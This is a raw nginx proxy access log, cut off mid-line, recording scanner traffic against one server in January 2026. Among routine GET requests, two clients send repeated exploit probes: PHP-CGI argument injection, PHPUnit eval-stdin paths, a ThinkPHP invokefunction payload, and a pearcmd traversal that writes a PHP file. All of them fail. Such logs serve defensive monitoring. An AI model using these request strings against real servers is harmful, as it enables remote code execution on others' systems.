+[19/Jan/2026:15:36:59 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:15:53:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:16:04:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:10:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:16:15:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:16:16:23 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.83.27.140] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[19/Jan/2026:16:17:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 20.65.193.121] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[19/Jan/2026:16:18:21 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:16:31:20 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[19/Jan/2026:16:35:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:16:48:04 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 62.171.165.176] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:48:04 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 62.171.165.176] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:48:04 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 62.171.165.176] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:04 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:05 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:06 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 62.171.165.176] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:16:48:56 +0000] 400 - - http localhost "-" [Client 135.237.126.204] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:51:10 +0000] 400 - - http localhost "-" [Client 20.84.144.171] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:51:10 +0000] 400 - - http localhost "-" [Client 20.84.144.171] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:16:59:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[19/Jan/2026:17:00:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.55.246] [Length 1033] [Gzip -] "python-requests/2.31.0" "-" +[19/Jan/2026:17:00:53 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:17:02:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:17:03:14 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 42.116.242.247] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:17:03:15 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 118.70.178.158] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:17:03:16 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:17 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:17:03:17 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 42.113.60.198] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:18 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:21 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:22 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:23 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:25 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:26 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:28 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:29 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:30 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:32 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:33 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:35 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:36 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:37 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:39 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:40 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:42 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:43 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:45 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:46 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:47 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:49 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:50 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:51 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:53 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:54 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:55 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:57 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:58 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:03:59 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:01 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:02 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:04 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:05 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:07 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:08 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:09 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:11 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:12 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:14 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:04:15 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 42.113.60.198] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:17:05:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:17:13:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 71.6.232.22] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[19/Jan/2026:17:21:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:17:24:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:17:33:10 +0000] 200 - GET http 91.82.83.208 "/" [Client 36.88.134.199] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[19/Jan/2026:17:39:14 +0000] 200 - GET http 91.82.83.208 "/" [Client 185.146.212.228] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[19/Jan/2026:17:46:15 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:17:48:09 +0000] 404 - GET http 91.82.83.208 "/.git/objects/" [Client 185.241.208.170] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36" "-" +[19/Jan/2026:17:49:51 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 59.2.240.35] [Length 1033] [Gzip -] "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" "-" +[19/Jan/2026:17:50:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 71.6.232.30] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[19/Jan/2026:17:55:03 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:18:05:02 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.92.186] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:03 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.92.186] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php?rsd" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:04 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 34.186.92.186] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/blog/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/web/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/wordpress/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/website/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:18:05:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes/wlwmanifest.xml" [Client 34.186.92.186] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 